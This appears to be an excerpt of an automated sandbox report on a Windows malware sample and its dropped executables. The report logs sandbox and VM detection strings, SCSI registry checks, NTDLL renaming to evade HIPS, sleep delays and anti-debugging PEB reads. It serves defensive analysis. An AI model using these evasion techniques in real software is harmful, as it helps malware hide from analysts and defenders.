                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Yara detected AntiVM3Show sources
                        Source: Yara matchFile source: Process Memory Space: 66A4.exe PID: 3536, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: C5EA.exe, 00000012.00000002.379102872.00000000006BB000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                        Checks if the current machine is a virtual machine (disk enumeration)Show sources
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Renames NTDLL to bypass HIPSShow sources
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
                        Source: C:\Users\user\AppData\Local\Temp\977B.exe TID: 5728Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\152F.exe TID: 4988Thread sleep time: -90000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 571
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 375
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A6B90 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeThread delayed: delay time: 922337203685477
                        Source: explorer.exe, 00000006.00000000.294735709.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: explorer.exe, 00000006.00000000.295034386.0000000008AEA000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 00000006.00000000.281531555.0000000008C5B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                        Source: explorer.exe, 00000006.00000000.270174093.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: vmware
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                        Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWL
                        Source: 152F.exe, 00000023.00000003.505458126.0000000002F11000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: explorer.exe, 00000006.00000000.269637468.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                        Source: explorer.exe, 00000006.00000000.309552971.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                        Source: explorer.exe, 00000006.00000000.270552390.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                        Source: explorer.exe, 00000006.00000000.309552971.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                        Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_004040F0 RegCreateKeyExA,RegOpenKeyExA,GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0041B9B2 FindFirstFileExW,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeSystem information queried: ModuleInformation

                        Anti Debugging:

                        barindex
                        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_00427590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_02EBD727 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 17_2_02BA0042 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F340 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47DB40 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548B58 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F358 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B7A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B7A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53131B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52E33D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B504320 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F53CA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F53CA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49DBE9 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B471BE9 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4723F6 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5223E3 mov ecx, dword ptr fs:[00000030h]
